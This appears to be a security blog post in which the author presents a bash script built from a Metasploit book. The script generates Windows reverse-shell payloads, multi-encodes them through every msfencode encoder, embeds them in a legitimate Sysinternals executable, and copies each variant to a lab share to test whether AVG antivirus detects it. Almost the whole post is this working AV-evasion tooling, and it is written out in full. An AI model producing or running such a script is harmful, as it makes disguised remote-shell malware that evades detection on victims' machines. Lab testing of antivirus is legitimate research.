I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations. Then in the script copy it over to a file share on a Windows XP SP3 computer with AVG installed. The AVG would then detect if it was a virus.
Curious how this would work and kicked out the following script.
#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'
# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'
# Log file where how the payload was created and the filename of the payload
logFile='/root/multiEncoder/logFile.txt'
# Number of iterations to run the encoding through
iterationCount=5
# Bash script to create various payloads that are multi-encoded and test them against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free
# Using the following msfpayload options
# Payload: windows/shell_reverse_tcp
# LHOST: 172.29.231.1
# LPORT: 8080
# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
mount -t cifs //172.29.231.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi
# Loop through the available encoders in msfencode.listEncoders
while read listEncoders
do
# Work through various iteractions allowed for the encoding
for (( i=2; i<=$iterationCount; i++ ))
do
msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k
# If the test.exe fails to be created then skip over the remaining commands
if [[ -f "/root/multiEncoder/outputFiles/test.exe" ]]; then
# Create a random 64 character filename to use as the destination file
randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`
# Save the information to a log file in the event the encoding bypasses the AV
echo "${randomFileName}.exe - msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k" >> $logFile
cp -f /root/multiEncoder/outputFiles/test.exe /mnt/payloadTest/${randomFileName}.exe
cp -f /root/multiEncoder/outputFiles/test.exe /root/multiEncoder/archiveFiles/${randomFileName}.exe
rm -f /root/multiEncoder/outputFiles/test.exe
fi
# End If for the text.exe file not being created
done
# Done for the loop on the iteractionCount
done < /root/multiEncoder/msfencode.listEncoders
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
In the honeypot I found over 276 requests for cgi files that could be accessed to leverage the shellshock vulnerability documented as CVE-20...
No comments:
Post a Comment